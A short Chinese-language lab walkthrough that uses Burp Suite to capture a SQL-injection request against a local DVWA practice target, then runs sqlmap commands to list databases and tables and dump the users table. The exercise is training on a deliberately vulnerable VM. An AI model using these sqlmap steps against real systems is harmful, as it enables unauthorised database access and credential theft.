1.开启预先准备好的xampp靶机
2.在主机上打开火狐,在输入框输入http://172.16.12.13:81(172.16.12.13是靶机地址)
81代表的是dvwa的端口号
3.输入用户名:admin密码:password登录
4.把安全等级改为low级,点击提交
5.打开burp suite软件,设置拦截请求
(拦截http请求是建立在网络代理相同的情况下,可以手动配置)
6.打开火狐,点击sql注入,在输入框中输入1,点击提交
7.打开bs显示被拦截
8.全部选中,点击鼠标右键,选择复制到文件
9.创建一个名叫wn.txt的文件
10.打开sqlmap,输入python sqlmap.py -r “d:wn.txt”--dbs
-r:读取系统文件
--dbs:枚举数据库名称
11.查到数据库dvwa,输入python sqlmap.py -r “d:wn.txt” -D dvwa --tables
-D:指定数据库
--tables:查找数据库的中表
12.查询到users表,输入python sqlmap.py -r “d:wn.txt” -D dvwa -T users
--dump
-T:指定数据库中的表
--dump:列举数据库的表中部分数据
13.至此sqlmap注入成功,成功得到数据库users表中的信息!